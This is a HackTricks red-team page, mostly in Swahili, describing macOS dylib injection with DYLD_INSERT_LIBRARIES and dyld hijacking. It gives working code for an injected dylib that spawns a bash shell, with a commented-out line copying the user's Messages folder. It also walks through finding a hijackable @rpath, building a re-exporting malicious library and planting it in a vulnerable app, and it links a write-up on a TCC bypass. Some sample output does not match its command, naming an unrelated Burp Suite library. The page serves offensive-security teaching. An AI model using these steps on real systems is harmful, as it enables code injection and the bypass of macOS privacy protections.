macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DYLD_INSERT_LIBRARIES Mfano wa msingi

Maktaba ya kuingiza ili kutekeleza shell:

// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((constructor))

void myconstructor(int argc, const char **argv)
{
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binary ya kushambulia:

// gcc hello.c -o hello
#include <stdio.h>

int main()
{
printf("Hello, World!\n");
return 0;
}

Uwekaji:

DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Mfano wa Dyld Hijacking

Binary iliyoathirika ni /Applications/VulnDyld.app/Contents/Resources/lib/binary.

codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

# Check where are the @rpath locations
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
cmd LC_RPATH
cmdsize 32
path @loader_path/. (offset 12)
--
cmd LC_RPATH
cmdsize 32
path @loader_path/../lib2 (offset 12)

# Check librareis loaded using @rapth and the used versions
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
name @rpath/lib.dylib (offset 24)
time stamp 2 Thu Jan  1 01:00:02 1970
current version 1.0.0
compatibility version 1.0.0
# Check the versions

Kwa taarifa za awali tunajua kwamba haichunguzi saini ya maktaba zilizopakiwa na inajaribu kupakia maktaba kutoka:

/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib
/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

Hata hivyo, ya kwanza haipo:

pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib

Hivyo, inawezekana kuiteka! Unda maktaba ambayo inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:

lib.m

#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

Ili kuikamilisha:

gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:

#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)

Hatimaye nakala tu kwenye mahali palipoharibiwa:

cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

Na tekeleza binary na uangalie maktaba ilipakiwa:

"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Matumizi: [...]

Andiko zuri kuhusu jinsi ya kutumia udhaifu huu kuharibu ruhusa za kamera za telegram linaweza kupatikana katika https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/

Kiwango Kikubwa

Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kujua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa /bin/bash).

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousmacOS Library Injection NextmacOS Dyld Process

Last updated 4 months ago